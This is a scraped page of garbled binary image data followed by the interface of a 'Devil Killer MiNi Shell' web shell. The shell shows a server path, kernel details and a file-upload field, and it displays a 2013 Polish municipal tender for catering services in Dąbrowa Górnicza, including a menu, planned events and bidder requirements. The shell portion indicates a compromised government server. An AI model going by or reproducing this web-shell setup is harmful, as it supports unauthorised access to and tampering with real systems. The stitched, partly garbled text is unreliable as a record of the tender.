JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130205/48656-N-2013.html

<p class="kh_header"><b>Dąbrowa Górnicza: Świadczenie usług cateringowych dla Urzędu Miejskiego w Dąbrowie Górniczej</b><br>
<b>Numer ogłoszenia: 48656 - 2013; data zamieszczenia: 05.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Górnicza , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 2956700, faks 32 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług cateringowych dla Urzędu Miejskiego w Dąbrowie Górniczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Postępowanie o udzielenie zamówienia publicznego prowadzone w trybie przetargu nieograniczonego na podstawie ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 z późniejszymi zmianami) o wartości zamówienia poniżej 200.000,00 EUR.
2.Przedmiotem zamówienia jest świadczenie w roku bieżącym usług cateringowych dla Urzędu Miejskiego w Dąbrowie Górniczej. 
3. Świadczenie usług cateringowych będzie odbywało się sukcesywnie w okresie obowiązywania umowy w ramach organizowanych przez Zamawiającego spotkań okolicznościowych, imprez (w tym imprez plenerowych), konferencji/seminariów, zawodów oraz innych zaistniałych okoliczności np. akcji ratowniczych.
4. Przedmiot zamówienia obejmuje przygotowanie, dostawę, podanie wybranych z poniższego menu posiłków i napojów:
1.	Rosół z makaronem	250ml
2.	Zupa krem borowikowa	250ml
3.	Zupa pomidorowa	250ml
4.	Zupa krem brokułowa	250ml
5.	Zupa krem cebulowa z grzankami	250ml
6.	Zupa krem z zielonego groszku 	250ml
7.	Zupa grochowa z kiełbasą	350ml
8.	Zupa grochowa	300ml
9.	Zupa gulaszowa	300ml
10.	Barszcz czerwony z krokietem (krokiet z kapustą i grzybami)	250ml
11.	Barszcz czerwony z uszkami (uszka z kapustą i grzybami)	250ml
12.	Barszcz czerwony	200ml
13.	Żurek wiejski (z kiełbasą i jajkiem)	350ml
14.	Kotlet schabowy	200g
15.	Polędwiczki wieprzowe w sosie kurkowym	200g
16.	Polędwiczki wieprzowe w sosie śmietanowo-borowikowym	200g
17.	Sznycel zapiekany z pomidorami i serem mozzarellą	200g
18.	Kotlet de volaille z serem i pieczarkami	200g
19.	Pieczone udko z kurczaka	200g
20.	Pierś z kurczaka smażona	200g
21.	Pierś z kurczaka nadziewana szpinakiem w sosie śmietanowym	200g
22.	Karp smażony (dzwonko)	200g
23.	Łosoś smażony (dzwonko)	200g
24.	Filet z łososia (grillowany)	200g
25.	Pstrąg smażony	200g
26.	Leczo z kiełbasą i papryką	300ml
27.	Boeuf Strogonow	300ml
28.	Gulasz po węgiersku	300ml
29.	Bogracz	300ml
30.	Bigos	300g
31.	Pieczonki (skład minimum: ziemniaki, marchewka, burak, cebula, kiełbasa, boczek)	300g
32.	Kiełbasa z grilla (łącznie z dodatkami: ketchup, musztarda)	200g
33.	Karkówka z grilla (łącznie z dodatkami: ketchup, musztarda)	200g
34.	Szaszłyk mięsno-warzywny z grilla (łącznie z dodatkami: ketchup, musztarda, skład minimum: papryka, boczek, cebula, karkówka)	200g
35.	Kaszanka z grilla (łącznie z dodatkami: ketchup, musztarda)	200g
36.	Grillowany oscypek z żurawiną	35g
37.	Surówka z kapusty białej	150g
38.	Surówka z kapusty czerwonej	150g
39.	Surówka z kapusty kiszonej	150g
40.	Surówka colesław	150g
41.	Surówka z marchwi	150g
42.	Sałatka grecka (skład minimum: pomidor, ogórek zielony, oliwki, ser feta, sałata lodowa)	200g
43.	Sałatka z gyrosem (skład minimum: grillowany kurczak, kapusta pekińska, kukurydza konserwowa, ogórek konserwowy, papryka konserwowa, majonez)	200g
44.	Sałatka serowo-ananasowa (skład minimum: ser żółty, ananas, kukurydza konserwowa, szynka konserwowa, majonez)	200g
45.	Sałatka jarzynowa z majonezem (skład minimum: ziemniaki, marchew, jajko, groszek, ogórek kiszony, seler, pietruszka)	200g
46.	Kapusta zasmażana	150g
47.	Ziemniaki z wody	150g
48.	Ziemniaki smażone	150g
49.	Frytki	150g
50.	Dufinki	150g
51.	Kluski śląskie	150g
52.	Ryż na sypko	150g
53.	Ryż z warzywami (skład minimum: marchewka, cebula)	150g
54.	Warzywa z wody (skład minimum: brokuł, marchewka, kalafior, fasolka szparagowa)	150g
55.	Pierogi z kapustą i grzybami	150g
56.	Smalec swojski	1kg
57.	Ogórki kiszone	1kg
58.	Bułka zwykła pszenna duża	1 sztuka/90g
59.	Bułka zwykła pszenna kajzerka	1 sztuka/50g
60.	Chleb wiejski	1 kg
61.	Zestaw wędlin (10 różnych rodzajów m.in.: szynka, polędwica wieprzowa, polędwica drobiowa, salami, schab pieczony, karczek) z przybraniem	300g
62.	Roladki szynkowe z kremem chrzanowym	200g
63.	Schab nadziewany suszonymi śliwkami	200g
64.	Jajka faszerowane pieczarkami 	200g
65.	Zestaw serów (10 różnych rodzajów m.in.: gouda, camembert, brie, edam, cheddar) z przybraniem	300g
66.	Kanapki bankietowe na pieczywie razowym (różnych rodzajów: z serem, z szynką, warzywami )	1 sztuka/50g
67.	Koreczki  (różnych rodzajów:  z wędliną, warzywami, serem)	1 sztuka/25g
68.	Koreczki rybne (różnych rodzajów: z łososiem, śledziem itp.)	1 sztuka/25g
69.	Tartinki (krakers + dodatki różnych rodzajów: wędlina, ser, warzywa + dip)	1 sztuka/25g
70.	Pstrąg w galarecie	200g
71.	Ryba po grecku	200g
72.	Tymbalik drobiowy	100g
73.	Pikle warzywne (m.in.: ogórek konserwowy, marchew, cebula)	200g
74.	Ciasteczka bankietowe (różne rodzaje: kruche, z cukrem, z czekoladą, z nadzieniem, kokosowe itp.)	1kg
75.	Sernik po wiedeńsku	1kg
76.	Ciasto szarlotka	1kg
77.	Ciasto miodownik	1 kg
78.	Ciasto w-z	1kg
79.	Ciasto makowiec	1 kg
80.	Pączki z nadzieniem budyniowym lub marmoladą	1 sztuka/100g
81.	Bułka słodka z budyniem, serem, dżemem lub makiem	1 sztuka/ 90g
82.	Napoleonka z nadzieniem budyniowym	1kg
83.	Babeczka owocowa	1 sztuka/70g
84.	Talerz owoców (m.in.: jabłko, pomarańcza, kiwi, banan)	1kg
85.	Sok 100% (różnych rodzajów: pomarańczowy, jabłkowy, wieloowocowy, grapefruitowy itp.) typu Hortex lub równoważny	1 litr
86.	Woda mineralna niegazowana typu Nałęczowianka lub równoważna	1 litr
87.	Woda mineralna gazowana typu Nałęczowianka lub równoważna	1 litr
88.	Napój gazowany słodzony typu Coca-cola lub równoważny	1 litr
89.	Kawa rozpuszczalna (łącznie z dodatkami: cukier, mleczko do kawy w płynie) typu Jacobs lub równoważna	200ml
90.	Kawa z ekspresu ciśnieniowego (łącznie z dodatkami: cukier, mleczko do kawy w płynie)	200ml
91.	Herbata (łącznie z dodatkami: cukier, plasterek cytryny) typu Lipton lub równoważna	200ml.
5. Zamawiający w ramach świadczenia usług cateringowych przewiduje m.in. następujące zlecenia:
- Spotkania Prezydenta Miasta z członkami Dąbrowskiej Rady Biznesu- łącznie 4 spotkania, ilość osób ok. 26 osób każde spotkanie, przewidywany termin - jedno spotkanie w kwartale
- Seminarium gospodarcze podczas Światowego Tygodnia Przedsiębiorczości - ilość osób ok.90, przewidywany termin listopad 2013
- Finał Ligi Młodych Przedsiębiorców - ilość osób ok. 80, przewidywany termin kwiecień 2013
- Festiwal Miast Partnerskich - Aktywni Obywatele Europy, ilość osób ok. 100, przewidywany termin maj/czerwiec 2013 (projekt czterodniowy)
- Partnership Around the Oak, ilość osób ok.50, przewidywany termin marzec 2013(projekt trzydniowy)
- Zawody miejskie Sprawni jak żołnierze, ilość osób ok.110, przewidywany termin: 01.03-26.04.2013r.
- Zawody rejonowe Sprawni jak żołnierze, ilość osób ok.110, przewidywany termin: 18.03-20.05.2013r.
- Światowy Dzień Zdrowia, ilość osób ok. 100, przewidywany termin: kwiecień 2013r. 
- Samorządowy Turniej Bowlingowy o Puchar Prezydenta Miasta z okazji Dni Dąbrowy Górniczej, ilość osób ok. 50, przewidywany termin: 31.05.2013r.
- Samorządowe zawody wędkarskie o Puchar Prezydenta Miasta z okazji Dni Dąbrowy Górniczej, ilość osób ok. 40, przewidywany termin: 2.06.2013r.
- Otwarte Regaty Żeglarskie o Puchar Prezydenta Miasta z okazji Dni Dąbrowy Górniczej, ilość osób ok. 45, przewidywany termin1 lub 2 czerwiec 2013
- Dni Dąbrowy Górniczej, ilość osób ok. 200, przewidywany termin: 31.05-2.06 2013r.
- Zawody sportowo-pożarnicze, ilość osób ok. 160, przewidywany termin: czerwiec 2013r.
- Dożynki Miejskie, ilość osób ok. 500, przewidywany termin: 8.09.2013r.
- VII Międzynarodowy Konkurs Muzyczny im. M. Spisaka, ilość osób ok. 30, przewidywany termin: 
14-23.09.2013r., miejsce: Katowice
- VI Mistrzostwa Pracowników Samorządowych i Radnych GZM, ilość osób ok. 300, przewidywany termin: październik 2013r.
- VIII Dąbrowski Kiermasz Świąteczny, ilość osób ok. 400, przewidywany termin: 13.12.2013r.
- Spotkanie wigilijne Prezydenta Miasta z Zarządami Dąbrowskich Stowarzyszeń Sportowych, ilość osób ok. 60, przewidywany termin: grudzień 2013r.
- Spotkanie opłatkowe Prezydenta Miasta z Kołami Gospodyń Wiejskich, ilość osób ok. 140, przewidywany termin: grudzień 2013r
- posiłki i napoje dla strażaków ochotników biorących udział w akcjach ratowniczo - gaśniczych oraz osób poszkodowanych w zdarzeniach
- szkolenia organizowane przez Inkubator Społecznej Przedsiębiorczości w ramach projektu nr POKL.07.02.02-24-017/11-00 Inkubator Społecznej Przedsiębiorczości Województwa Śląskiego współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, ilość uczestników 12 na każdym szkoleniu (łącznie sześć szkoleń), przewidywany termin:  kwiecień, maj, czerwiec, październik, listopad2013
- spotkania robocze w ramach budowania partnerstw lokalnych organizowanych przez Inkubator Społecznej Przedsiębiorczości w Dąbrowie Górniczej w ramach projektu nr POKL.07.02.02-24-017/11-00 Inkubator Społecznej Przedsiębiorczości Województwa Śląskiego współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, ilość osób ok. 20 na każde spotkanie (3 grupy robocze), przewidywany termin: kwiecień, czerwiec, październik
- inne zlecenia.
6.Zamawiający zastrzega sobie prawo do niezrealizowania wszystkich zleceń wymienionych w pkt. 3.3.4. SIWZ, co Wykonawca przyjmuje do wiadomości i nie wnosi co do tego zastrzeżeń. Podane ilości osób oraz terminy są szacunkowe i uzależnione będą od faktycznych potrzeb Zamawiającego.
7.Usługi cateringowe będą świadczone w siedzibie Zamawiającego lub w miejscu przez Zamawiającego wyznaczonym na terenie Dąbrowy Górniczej za wyjątkiem VII Międzynarodowego Konkursu Muzycznego im. Michała Spisaka, który odbędzie się w Katowicach.
8.Ilość porcji oraz rodzaj posiłku i napojów każdorazowo będą określane i zlecane przez Zamawiającego telefonicznie, faksem lub e-mailem z co najmniej 2 dniowym wyprzedzeniem z podaniem terminu, miejsca, sposobu podania oraz godziny podania posiłków i napojów.
9.Ilość porcji oraz rodzaj posiłku i napojów w przypadku akcji ratowniczych  będą określane i zlecane przez Zamawiającego telefonicznie z co najmniej 4 godzinnym wyprzedzeniem z podaniem miejsca 
i godziny podania posiłków i napojów. 
10.Posiłki winny być świeże, I gatunku i przygotowane przez Wykonawcę wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych.
11.Posiłki nie mogą być wykonane z produktów typu instant (np. zupy w proszku sosy, itp.) oraz produktów gotowych (np. mrożone pierogi itp.)
12. Posiłki i napoje winny być dostarczone przez Wykonawcę jego transportem, na miejsce wskazane przez Zamawiającego, najpóźniej na 30 minut przed ustalonymi z Zamawiającym godzinami. 
13. Wykonawca odpowiada za transport przedmiotu zamówienia, przygotowanie oraz podanie go zgodnie z wymaganiami sanitarnymi dotyczącymi żywności i żywienia, w szczególności zobowiązany jest do przestrzegania wymagań określonych w ustawie o bezpieczeństwie żywności i żywienia.
14. Stoły winny być przygotowane przez Wykonawcę w sposób ustalony każdorazowo 
z Zamawiającym.
15. Posiłki  typu zimna płyta winny być podane najpóźniej na 15 minut przed ustalonymi z Zamawiającym godzinami.
16. Posiłki i napoje winny być podane w sposób estetyczny.
17. Posiłki i napoje winny być podawane  przez obsługę kelnerską Wykonawcy.
18. Wykonawca w zależności od ilości osób uczestniczących w spotkaniu czy innym zdarzeniu o którym mowa w pkt. 3.3.4. SIWZ zapewni każdorazowo do obsługi od 1 do 10 osób.
19.Posprzątanie stołów, zebranie naczyń oraz resztek pokonsumpcyjnych należy do Wykonawcy 
i winno się odbyć niezwłocznie po zakończeniu spotkania czy innego zdarzenia o którym mowa w pkt. 3.3.4. SIWZ.
20.Podanie posiłków i napojów (w zależności od okazji): w zastawie ceramicznej/porcelanowej 
z użyciem sztućców ze stali nierdzewnej, serwetek i obrusów materiałowych, w szklankach literatkach, filiżankach itp. lub w naczyniach jednorazowych z użyciem sztućców, serwetek i obrusów  jednorazowych zależy od wyboru Zamawiającego. 
21.Użyta zastawa (w tym m.in. nakrycie stołów, dekoracje) oraz w przypadku zaistnienia takiej potrzeby stoły dostarczone przez Wykonawcę winny być czyste i nieuszkodzone.
22.Posiłki winny być przygotowane zgodnie z ustalonym przez Zamawiającego menu.
23.Wykonawca zobowiązuje się na bieżąco uwzględnić ewentualne sugestie i życzenia Zamawiającego dotyczące sposobu realizacji złożonych przez Zamawiającego zleceń.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.Zamawiający przewiduje udzielenie zamówień uzupełniających w stosunku do zamówienia podstawowego opisanego w specyfikacji na podstawie art. 67 ust.1 pkt. 6 Ustawy.
2.Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających.  
Realizacja zamówień uzupełniających odbywać się będzie w zakresie przewidzianym opisem przedmiotu zamówienia i określonym kodem CPV do wartości 20% zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.32.10.00-6, 55.32.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada aktualną Decyzję o zatwierdzeniu zakładu i o wpisie do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Inspekcji Sanitarnej, pozwalającą na prowadzenie działalności w zakresie usług cateringowych.
Weryfikacja zostanie przeprowadzona na podstawie złożonych
dokumentów wg formuły:spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał usługi w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia tj.: 
- min. 1 usługę cateringową polegającą na obsłudze dużych imprez plenerowych typu festyny, pikniki, dożynki, dni miast, imprezy rekreacyjno-sportowe itp. o wartości minimum 8.000,00 zł brutto,
- min. 1 usługę cateringową polegającą na obsłudze imprez okolicznościowych typu koncerty, konkursy, jubileusze, bankiety, spotkania integracyjne itp. o wartości minimum 7.000,00 zł brutto,
- min. 1 usługę cateringową polegającą na obsłudze konferencji, seminariów, szkoleń, wykładów, delegacji itp. o wartości minimum 2.000,00 zł brutto .
Uwagi: 
1. Jeżeli zakres wskazanych i udokumentowanych, przez Wykonawcę w wykazie, usług jest szerszy niż wymagany przez Zamawiającego, Wykonawca winien w wykazie wskazać zakres i wartość usług odpowiadających zakresowi wymaganemu przez Zamawiającego.
2. Równowartość w złotych zadań rozliczanych w walutach obcych zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego  w dniu, w którym opublikowane zostało ogłoszenie o niniejszym zamówieniu.
Weryfikacja zostanie przeprowadzona na podstawie złożonego wykazu oraz dokumentów wg formuły:spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie, ocena spełniania warunku zostanie dokonana na podstawie żądanego oświadczenia z art. 22 ust. 1 Ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie
spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie, ocena spełniania warunku zostanie dokonana na podstawie żądanego oświadczenia z art. 22 ust. 1 Ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie
spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie, ocena spełniania warunku zostanie dokonana na podstawie żądanego oświadczenia z art. 22 ust. 1 Ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie
spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

